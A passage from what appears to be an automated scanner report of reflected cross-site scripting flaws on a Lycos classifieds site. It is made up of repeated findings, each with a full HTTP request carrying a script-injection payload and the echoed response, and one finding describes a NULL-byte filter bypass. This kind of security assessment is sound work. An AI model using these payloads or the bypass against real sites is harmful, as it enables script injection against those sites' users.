<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/service-pet-veterinarian/?f5d8a"><script>alert(1)</script>5f431f82572=1&mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 19db0"><script>alert(1)</script>d7c28e4b076 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /service-tech19db0"><script>alert(1)</script>d7c28e4b076/ HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 15:16:46 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:16:46 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17691
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/service-tech19db0"><script>alert(1)</script>d7c28e4b076/?mobile=1" rel="nofollow"> ...[SNIP]...
1.207. http://classifieds.lycos.com/service-tech/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://classifieds.lycos.com
Path:
/service-tech/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 21ab1"><script>alert(1)</script>24d279bc44e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /service-tech/?21ab1"><script>alert(1)</script>24d279bc44e=1 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:16:09 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:16:09 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 37223
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/service-tech/?21ab1"><script>alert(1)</script>24d279bc44e=1&mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ad8a1"><script>alert(1)</script>8e9027af6c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /servicead8a1"><script>alert(1)</script>8e9027af6c/ HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 14:59:59 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:59:59 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17673
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/servicead8a1"><script>alert(1)</script>8e9027af6c/?mobile=1" rel="nofollow"> ...[SNIP]...
1.209. http://classifieds.lycos.com/service/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://classifieds.lycos.com
Path:
/service/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68c09"><script>alert(1)</script>d95411a21e3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /service/?68c09"><script>alert(1)</script>d95411a21e3=1 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 14:59:27 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:59:27 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 41487
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/service/?68c09"><script>alert(1)</script>d95411a21e3=1&mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d46a3"><script>alert(1)</script>52170a0140d was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sitemapd46a3"><script>alert(1)</script>52170a0140d/ HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 15:19:09 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:19:09 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17676
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/sitemapd46a3"><script>alert(1)</script>52170a0140d/?mobile=1" rel="nofollow"> ...[SNIP]...
1.211. http://classifieds.lycos.com/sitemap/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://classifieds.lycos.com
Path:
/sitemap/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2ddd3"><script>alert(1)</script>90a1bbc1cb2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /sitemap/?2ddd3"><script>alert(1)</script>90a1bbc1cb2=1 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:18:33 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:18:33 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 96318
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/sitemap/?2ddd3"><script>alert(1)</script>90a1bbc1cb2=1&mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fd873"><script>alert(1)</script>a3b7f789261 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /vehicle-boatfd873"><script>alert(1)</script>a3b7f789261/ HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 15:14:38 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:14:38 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17691
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/vehicle-boatfd873"><script>alert(1)</script>a3b7f789261/?mobile=1" rel="nofollow"> ...[SNIP]...
1.213. http://classifieds.lycos.com/vehicle-boat/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://classifieds.lycos.com
Path:
/vehicle-boat/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f6b7"><script>alert(1)</script>f4fcf37b3ff was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /vehicle-boat/?6f6b7"><script>alert(1)</script>f4fcf37b3ff=1 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:14:11 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:14:11 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 68506
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/vehicle-boat/?6f6b7"><script>alert(1)</script>f4fcf37b3ff=1&mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2d1fd"><script>alert(1)</script>885ff275591 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /vehicle-car-convertible2d1fd"><script>alert(1)</script>885ff275591/ HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 15:15:16 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:15:16 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17724
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/vehicle-car-convertible2d1fd"><script>alert(1)</script>885ff275591/?mobile=1" rel="nofollow"> ...[SNIP]...
1.215. http://classifieds.lycos.com/vehicle-car-convertible/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://classifieds.lycos.com
Path:
/vehicle-car-convertible/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c63cc"><script>alert(1)</script>c9c5f17cb02 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /vehicle-car-convertible/?c63cc"><script>alert(1)</script>c9c5f17cb02=1 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:14:42 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:14:42 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 102597
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/vehicle-car-convertible/?c63cc"><script>alert(1)</script>c9c5f17cb02=1&mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9749e"><script>alert(1)</script>0dc818c9da5 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /vehicle-car-coupe9749e"><script>alert(1)</script>0dc818c9da5/2011-honda-accord-24330-00-2416142893 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 15:00:00 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:00:00 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17817
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/vehicle-car-coupe9749e"><script>alert(1)</script>0dc818c9da5/2011-honda-accord-24330-00-2416142893?mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %007b82f"><script>alert(1)</script>db619e10b8c was submitted in the REST URL parameter 2. This input was echoed as 7b82f"><script>alert(1)</script>db619e10b8c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /vehicle-car-coupe/2011-honda-accord-24330-00-2416142893%007b82f"><script>alert(1)</script>db619e10b8c HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 15:01:07 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:01:07 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 25703
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/vehicle-car-coupe/2011-honda-accord-24330-00-2416142893%007b82f"><script>alert(1)</script>db619e10b8c?mobile=1" rel="nofollow"> ...[SNIP]...
1.218. http://classifieds.lycos.com/vehicle-car-coupe/2011-honda-accord-24330-00-2416142893 [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 16927"><script>alert(1)</script>eb489a6e3c3 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /vehicle-car-coupe/2011-honda-accord-24330-00-2416142893?16927"><script>alert(1)</script>eb489a6e3c3=1 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 14:59:30 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 14:59:30 GMT; path=/ Set-Cookie: classifieds[lastpage][0][category]=vehicle%2Fcar%2Fcoupe; path=/ Set-Cookie: classifieds[lastpage][0][name]=Coupes; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 24749
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/vehicle-car-coupe/2011-honda-accord-24330-00-2416142893?16927"><script>alert(1)</script>eb489a6e3c3=1&mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 14e32"><script>alert(1)</script>3f1c6acac78 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /vehicle-car-mini_van14e32"><script>alert(1)</script>3f1c6acac78/ HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 15:14:51 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:14:51 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17715
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/vehicle-car-mini_van14e32"><script>alert(1)</script>3f1c6acac78/?mobile=1" rel="nofollow"> ...[SNIP]...
1.220. http://classifieds.lycos.com/vehicle-car-mini_van/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://classifieds.lycos.com
Path:
/vehicle-car-mini_van/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3e995"><script>alert(1)</script>11a9fa7813b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /vehicle-car-mini_van/?3e995"><script>alert(1)</script>11a9fa7813b=1 HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 200 OK Date: Mon, 07 Feb 2011 15:14:18 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:14:18 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 93840
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content- ...[SNIP]... <a href="/vehicle-car-mini_van/?3e995"><script>alert(1)</script>11a9fa7813b=1&mobile=1" rel="nofollow"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e3b74"><script>alert(1)</script>2118badbcb7 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /vehicle-car-sedane3b74"><script>alert(1)</script>2118badbcb7/ HTTP/1.1 Host: classifieds.lycos.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: displayMobile=0; lubid=525C4A5D2A37DE07BB16757F6C63D323DD301777EDF5; __utmz=207906063.1297090205.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=207906063.1823519616.1297090205.1297090205.1297090205.1; PENTA=173.193.214.243.1297090182456621; __utmc=207906063; __utmb=207906063.5.10.1297090205;
Response
HTTP/1.1 404 Not Found Date: Mon, 07 Feb 2011 15:00:56 GMT Server: Apache X-Powered-By: PHP/5.1.6 Set-Cookie: displayMobile=0; expires=Tue, 07-Feb-2012 15:00:56 GMT; path=/ P3P: policyref="http://www.lycos.com/w3c/p3p.xml", CP="CAO DSP CUR ADM DEV PSA CONo TAI OUR IND DEM PRE PUR NAV UNI" Connection: close Content-Type: text/html; charset=utf-8 Content-Length: 17706
